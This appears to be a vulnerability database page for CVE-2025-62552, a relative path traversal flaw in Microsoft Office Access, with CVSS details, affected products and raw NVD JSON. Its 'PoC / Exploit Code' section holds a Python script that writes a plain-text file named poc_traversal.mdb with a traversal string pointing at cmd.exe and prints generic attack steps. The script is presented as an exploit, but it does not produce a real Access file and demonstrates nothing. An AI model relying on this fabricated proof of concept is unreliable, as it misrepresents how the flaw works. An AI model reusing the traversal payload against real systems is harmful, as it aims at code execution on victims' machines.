Security Vulnerability Report
中文
CVE-2025-62552 CVSS 7.8 HIGH

CVE-2025-62552

Published: 2025-12-09 18:16:00
Last Modified: 2025-12-09 19:34:43

Description

Relative path traversal in Microsoft Office Access allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:access:2016:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x86:* - VULNERABLE
Microsoft Office Access < 最新安全更新版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62552 PoC - Relative Path Traversal in Microsoft Office Access # This PoC demonstrates the path traversal vulnerability concept # Note: This is for educational and testing purposes only import os import struct def create_malicious_access_file(): """ Create a malicious Access file that exploits the path traversal vulnerability """ # Path traversal payload to escape the intended directory malicious_path = "..\\..\\..\\Windows\\System32\\cmd.exe" # Create a simple proof-of-concept file # In real scenario, this would be a crafted .mdb or .accdb file poc_content = f""" [VERSION] PRODUCT_NAME=Microsoft Office Access VULNERABLE_PATH={malicious_path} [EXPLOIT] TYPE=Relative Path Traversal CVE=CVE-2025-62552 CVSS=7.8 """ with open("poc_traversal.mdb", "w") as f: f.write(poc_content) print(f"[+] Created malicious file: poc_traversal.mdb") print(f"[+] Payload: {malicious_path}") print("[!] This file should be opened by the victim in Microsoft Office Access") def demonstrate_attack_vector(): """ Demonstrate the attack vector for the path traversal vulnerability """ print("\n[*] Attack Vector Analysis:") print("1. Attacker creates a malicious Access file with path traversal payload") print("2. Payload contains: ../../../Windows/System32/cmd.exe") print("3. Victim opens the file in Microsoft Office Access") print("4. Access processes the malicious path without proper validation") print("5. Attacker can execute arbitrary code on the victim's system") if __name__ == "__main__": print("CVE-2025-62552 Path Traversal PoC Generator") print("=" * 50) create_malicious_access_file() demonstrate_attack_vector() print("\n[!] Disclaimer: This PoC is for educational purposes only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62552", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:00.287", "lastModified": "2025-12-09T19:34:42.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Relative path traversal in Microsoft Office Access allows an unauthorized attacker to execute code locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:*", "matchCriteriaId": "3259EBFE-AE2D-48B8-BE9A-E22BBDB31378"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:*", "matchCriteriaId": "CD25F492-9272-4836-832C-8439EBE64CCF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:access:2016:*:*:*:*:*:*:*", "matchCriteriaId": "0E42DC73-F1D0-47CD-BED8-DB2C6E044E2D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x64:*", "matchCriteriaId": "CF5DDD09-902E-4881-98D0-CB896333B4AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x86:*", "matchCriteriaId": "26A3B226-5D7C-4556-9350-5222DC8EFC2C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:x64:*", "matchCriteriaId": "851BAC4E-9965-4F40-9A6C-B73D9004F4C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:x86:*", "matchCriteriaId": "23B2FA23-76F4-4D83-A718-B8D04D7EA37B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x64:*", "matchCriteriaId": "D31E509A-0B2E-4B41-88C4-0099E800AFE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x86:*", "matchCriteriaId": "017A7041-BEF1-4E4E-AC8A-EFC6AFEB01FE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62552", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}